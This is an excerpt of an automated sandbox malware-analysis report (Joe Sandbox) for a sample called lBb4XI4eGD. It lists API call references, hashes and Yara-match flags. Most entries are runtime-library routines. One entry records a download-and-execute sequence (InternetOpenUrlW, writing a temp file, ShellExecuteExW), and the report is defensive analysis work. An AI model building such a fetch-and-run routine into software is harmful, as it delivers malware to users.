                                                                                                                                                                                                                                • String ID: hef
                                                                                                                                                                                                                                • API String ID: 2545303185-98441221
                                                                                                                                                                                                                                • Opcode ID: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                                • Instruction ID: 592aba8080b11a69c6e8af25da0e3a71807a27334faeadba24c5a0a63d01ebad
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c1ac1bd017a9acd203bd2fc245b57fc6318294ea1881e019892625608c4a2c2b
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5B61A3B5900219AFCB24AF64DD48BAA7BB8FF48706F044179F605E22A1D7B4DA41CB1C
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                                                                                • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                • Instruction ID: 874f01748d4a99c634df59c5d1d772f56989046783fbc6c66b0401e284c858af
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5B1DFB0D402099FDB219F68C884FFEBBF6BF48304F044669E899A7291D735A851DF60
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$Info
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 2509303402-0
                                                                                                                                                                                                                                • Opcode ID: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                                                                                                                                                • Instruction ID: 00ca1cae550ae33e56ff2d48992555244a41b63278d5bed064242715bcfe7aee
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3c8bd96b14d453fc78fbdfa0c935f0ea1f368fed7a7b63a3d2dca3ea6bd9dcea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 45B1CFB1E002159EEB11DF66C841BEEBBB4FF08304F54446FF999A7342D739A9418B28
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0217A893
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179BFF
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C11
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C23
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C35
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C47
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C59
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C6B
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C7D
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179C8F
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179CA1
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179CB3
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179CC5
                                                                                                                                                                                                                                  • Part of subcall function 02179BE2: _free.LIBCMT ref: 02179CD7
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A888
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: HeapFree.KERNEL32(00000000,00000000,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?), ref: 021736D7
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: GetLastError.KERNEL32(?,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?,?), ref: 021736E9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A8AA
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A8BF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A8CA
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A8EC
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A8FF
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A90D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A918
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A950
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A957
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A974
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217A98C
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                • Instruction ID: 6e3e03e3fada7e3146ac799cf38d29a7bc7b3c2cdc9c2e3e702d3304b894c9a1
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: DE316F71A803059FEB21AF38E844B5A77F9BF80311F114469E459D7260DF31F9A1DBA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • ___free_lconv_mon.LIBCMT ref: 0043A62C
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439998
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399AA
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399BC
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399CE
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399E0
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 004399F2
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A04
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A16
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A28
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A3A
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A4C
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A5E
                                                                                                                                                                                                                                  • Part of subcall function 0043997B: _free.LIBCMT ref: 00439A70
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A621
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: HeapFree.KERNEL32(00000000,00000000,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?), ref: 00433470
                                                                                                                                                                                                                                  • Part of subcall function 0043345A: GetLastError.KERNEL32(?,?,0043A0E8,?,00000000,?,00000000,?,0043A38C,?,00000007,?,?,0043A780,?,?), ref: 00433482
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A643
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A658
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A663
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A685
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A698
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6A6
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6B1
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6E9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A6F0
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A70D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0043A725
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 161543041-0
                                                                                                                                                                                                                                • Opcode ID: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                • Instruction ID: 592e84a200b8bfd7e94acad550198685aeb7160705af9e7bc43cea000efe3ccb
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 06440b44c22d454fcfdb7eecae663acef5c85cbb4bcd3e1a14e5022e47855d68
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4316D31A002019FEB229B3AD846B5773E8FF18315F18A41FE4D986251DB39AD508B19
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 269201875-0
                                                                                                                                                                                                                                • Opcode ID: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                • Instruction ID: 1e1df55711acecdaceb3f6a2bcf6b580ecd3898991ab0d8f2f462f5a0a61d494
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 4cb414690be6fda0ca229090f7b6620efc7f825f0c5babe970a6a28c94bdcbad
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 75C174B2D40205BBEB20DBA8CC43FEB77B8AB0C705F15515AFA05FB286D6B49D418B54
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • InternetOpenW.WININET(00451E78,00000000,00000000,00000000,00000000), ref: 02142C74
                                                                                                                                                                                                                                • InternetOpenUrlW.WININET(00000000,0045D818,00000000,00000000,00000000,00000000), ref: 02142C8A
                                                                                                                                                                                                                                • GetTempPathW.KERNEL32(00000105,?), ref: 02142CA6
                                                                                                                                                                                                                                • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 02142CBC
                                                                                                                                                                                                                                • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 02142CF5
                                                                                                                                                                                                                                • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 02142D31
                                                                                                                                                                                                                                • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 02142D4E
                                                                                                                                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 02142DC5
                                                                                                                                                                                                                                • WaitForSingleObject.KERNEL32(?,00008000), ref: 02142DDA
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: File$Internet$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                                                                                                                                                                                                • String ID: <
                                                                                                                                                                                                                                • API String ID: 838076374-4251816714
                                                                                                                                                                                                                                • Opcode ID: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                                • Instruction ID: 77758dca5922cccb1627e754f8c59ae6f2e3c1dc2720f3c258cd6827bbc60ab6
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9bf731035bfec187241e890923bec375076f7805f2a0f07ea48903a7d88d49b3
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 57414CB594021DAEEB209F609C85FEAB7BCFF05705F0080A6A549E2150DF709E898FA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0215F218,00000004,02157D77,00000004,02158059), ref: 0215EEE9
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0215F218,00000004,02157D77,00000004,02158059,?,02158789,?,00000008,02157FFD,00000000,?,?,00000000,?), ref: 0215EEF5
                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0215F218,00000004,02157D77,00000004,02158059,?,02158789,?,00000008,02157FFD,00000000,?,?,00000000), ref: 0215EF05
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0215EF1B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF31
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF48
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF5F
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF76
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF8D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                                                                                • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                • Opcode ID: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                                                                                                                                                • Instruction ID: f8a19c78fe3934891deae8e8989d07556ecf9087a5d7453bd3f2853d0e0f0f22
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b1baead230867a3f00ca1e51c1d382e39c45d004bab6a6c18617c1e862122828
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: AE217FB2944750FFE7116FB49C08B5ABFA8EF05B16F104A6AF951D3611CB7CC5408BA4
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • LoadLibraryExW.KERNEL32(advapi32.dll,00000000,00000800,0045A064,00000000,?,?,00000000,00441C03,000000FF,?,0215F218,00000004,02157D77,00000004,02158059), ref: 0215EEE9
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,0215F218,00000004,02157D77,00000004,02158059,?,02158789,?,00000008,02157FFD,00000000,?,?,00000000,?), ref: 0215EEF5
                                                                                                                                                                                                                                • LoadLibraryW.KERNEL32(advapi32.dll,?,0215F218,00000004,02157D77,00000004,02158059,?,02158789,?,00000008,02157FFD,00000000,?,?,00000000), ref: 0215EF05
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00447430), ref: 0215EF1B
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF31
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF48
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF5F
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF76
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00000000), ref: 0215EF8D
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$LibraryLoad$ErrorLast
                                                                                                                                                                                                                                • String ID: advapi32.dll
                                                                                                                                                                                                                                • API String ID: 2340687224-4050573280
                                                                                                                                                                                                                                • Opcode ID: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                                                                                                                                                • Instruction ID: 1e955b7bab2c2c4d517b327a803d7d7cde8dedf8b050838cef33bbf865a2ba33
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 99e788290a9b9b4e48efa8cfe9b0d171ae0e22239bfba1dadfb55c86f888b577
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: B5218EB2944760BFE7116FA49C08B5ABFACEF05B16F004A6AF951D3611CB7CD5408BA8
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,?,00000000,00000000,?,?,?,021566FB), ref: 021524A6
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CDC), ref: 021524B4
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000,00446CF4), ref: 021524C2
                                                                                                                                                                                                                                • GetModuleHandleW.KERNEL32(kernel32.dll,00446D0C,?,?,?,021566FB), ref: 021524F0
                                                                                                                                                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 021524F7
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,021566FB), ref: 02152512
                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,?,021566FB), ref: 0215251E
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 02152534
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02152542
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: AddressProc$ErrorHandleLastModule$Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorException@8Throw
                                                                                                                                                                                                                                • String ID: kernel32.dll
                                                                                                                                                                                                                                • API String ID: 4179531150-1793498882
                                                                                                                                                                                                                                • Opcode ID: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                                                                                                                                                • Instruction ID: 7fda172aa2791fb23dec39bde2e7eb7c5bd2b11ca6fba6ee5b8324bad3ee0446
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 86a114dfe65ccc4fa04666bdd8c1bca5b9a7b223918886f6160c3780a9292853
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: FF11A577950330BFE7117F756C59AAB3BACAD41B127600576FC21D3151EB78D5008AAC
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • Concurrency::details::ThreadProxy::SuspendExecution.LIBCMT ref: 00424856
                                                                                                                                                                                                                                  • Part of subcall function 00424B25: WaitForSingleObjectEx.KERNEL32(?,000000FF,00000000,00000000,00424589), ref: 00424B35
                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::ResetOnIdle.LIBCONCRT ref: 0042486B
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042487A
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 00424888
                                                                                                                                                                                                                                • Concurrency::details::FreeVirtualProcessorRoot::Affinitize.LIBCONCRT ref: 004248FE
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0042493E
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0042494C
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Exception@8FreeProcessorRoot::ThrowVirtualstd::invalid_argument::invalid_argument$AffinitizeExecutionIdleObjectProxy::ResetSingleSuspendThreadWait
                                                                                                                                                                                                                                • String ID: pContext$switchState
                                                                                                                                                                                                                                • API String ID: 3151764488-2660820399
                                                                                                                                                                                                                                • Opcode ID: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                • Instruction ID: ac479dc220ac8c4341dea52746a205dfcc737ca8ea5a0b270bd9d9db7e88fe8b
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3734a1ad1e391af5b1d37797e51a1a7898c33a57748dbc1e27873804117bc96e
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F7312835B002249BCF04EF65D881A6E73B5FF84314FA1456BE915A7382DB78EE05C798
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000002), ref: 00419758
                                                                                                                                                                                                                                • GetCurrentProcess.KERNEL32(000000FF,00000000), ref: 00419762
                                                                                                                                                                                                                                • DuplicateHandle.KERNEL32(00000000), ref: 00419769
                                                                                                                                                                                                                                • SafeRWList.LIBCONCRT ref: 00419788
                                                                                                                                                                                                                                  • Part of subcall function 00417757: Concurrency::details::_ReaderWriterLock::_AcquireWrite.LIBCONCRT ref: 00417768
                                                                                                                                                                                                                                  • Part of subcall function 00417757: List.LIBCMT ref: 00417772
                                                                                                                                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 0041979A
                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 004197A9
                                                                                                                                                                                                                                • Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_error.LIBCONCRT ref: 004197BF
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 004197CD
                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3953755338.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_400000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: CurrentListProcess$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorDuplicateErrorException@8HandleLastLock::_ReaderSafeThrowWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                                                                                                                                • String ID: eventObject
                                                                                                                                                                                                                                • API String ID: 1999291547-1680012138
                                                                                                                                                                                                                                • Opcode ID: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                                                                                                                                                • Instruction ID: beae42e10eedb78f2922afb802a2acb8663f7a2576d102abe215b1da82e9749d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: af56e6474bfbcfb1548dec2f01f626fb8f62d732f61f1ac0c92eedc387ce09ea
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 4C11AC75500204EACB14EFA4CC4AFEE77B8AF00701F20413BF41AE21D1EB789E88866D
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • GetCurrentThreadId.KERNEL32 ref: 02160C26
                                                                                                                                                                                                                                • Concurrency::details::UMS::CreateUmsCompletionList.LIBCONCRT ref: 02160C8D
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecutedAssociatedChore.LIBCONCRT ref: 02160CAA
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::WorkWasFound.LIBCONCRT ref: 02160D10
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::ExecuteChoreInline.LIBCMT ref: 02160D25
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::WaitForWork.LIBCONCRT ref: 02160D37
                                                                                                                                                                                                                                • Concurrency::details::InternalContextBase::SwitchTo.LIBCONCRT ref: 02160D65
                                                                                                                                                                                                                                • Concurrency::details::UMS::GetCurrentUmsThread.LIBCONCRT ref: 02160D70
                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 02160D9C
                                                                                                                                                                                                                                • Concurrency::details::WorkItem::TransferReferences.LIBCONCRT ref: 02160DAC
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: Concurrency::details::$Base::ContextInternal$Work$ChoreCurrentThread$AssociatedCompletionCreateException@8ExecuteExecutedFoundInlineItem::ListReferencesSwitchThrowTransferWait
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 3720063390-0
                                                                                                                                                                                                                                • Opcode ID: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                                • Instruction ID: 3b7c7b309df9091703634f43c2e1278ce8cd05a5a0bf350d9899d8b1254bab4d
                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 5c88d6c2783884595e80d68d3e5870dbc5133051b1680621d86c5f4de34e2022
                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 6C41BF31A842589FCF18FFA4C4587FD77A7AF09304F0440A9C95A6B2C2CB769A15CF62
                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172051
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: HeapFree.KERNEL32(00000000,00000000,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?), ref: 021736D7
                                                                                                                                                                                                                                  • Part of subcall function 021736C1: GetLastError.KERNEL32(?,?,0217A34F,?,00000000,?,00000000,?,0217A5F3,?,00000007,?,?,0217A9E7,?,?), ref: 021736E9
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217205D
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172068
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172073
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217207E
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172089
                                                                                                                                                                                                                                • _free.LIBCMT ref: 02172094
                                                                                                                                                                                                                                • _free.LIBCMT ref: 0217209F
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021720AA
                                                                                                                                                                                                                                • _free.LIBCMT ref: 021720B8
                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                • Source File: 00000000.00000002.3955276422.0000000002140000.00000040.00001000.00020000.00000000.sdmp, Offset: 02140000, based on PE: false
                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_2140000_lBb4XI4eGD.jbxd
                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                • API String ID: 776569668-0
